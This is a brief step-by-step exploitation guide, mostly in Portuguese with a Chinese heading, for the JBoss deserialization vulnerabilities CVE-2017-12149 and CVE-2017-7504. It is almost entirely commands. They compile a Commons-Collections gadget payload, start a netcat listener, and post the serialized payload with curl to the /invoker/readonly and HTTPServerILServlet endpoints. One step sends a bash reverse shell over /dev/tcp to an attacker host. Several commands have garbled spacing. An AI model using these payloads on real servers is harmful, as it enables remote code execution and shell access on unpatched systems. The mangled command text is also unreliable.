Vulnerabilidade de desserialização do JBoss Application Server
CVE-2017-12149
http://192.168.11.123:8080/invoker/readonly
1: Execute o arquivo de carga útil binário
javac -cp.: Commons-Collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2: Modifique o IP do host e a porta que aceita o shell
java -cp.: Commons-Collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip: port
3: Crie um novo terminal para monitorar
nc -vv -l 4444
4: Curl envia a carga de ataque para o servidor atacado.
curl http://192.168.11.123:8080/invoker/readonly --data-binary @ ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504
http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/
用法 实例:
1)
javac -cp.: Commons-Collections-3.2.1.jar ExampleCommonsCollections1.java
2)
java -cp.: commons-Collections-3.2.1.jar ExampleCommonsCollections1 '/ bin / bash -i> & / dev / tcp / ip / port <& 1'
3)
nc -lvvp 4444
4)
curl http://192.168.112.132:8080/jbossmq -httpil / HTTPServerILServlet / - data-binary @ ExampleCommonsCollections1.ser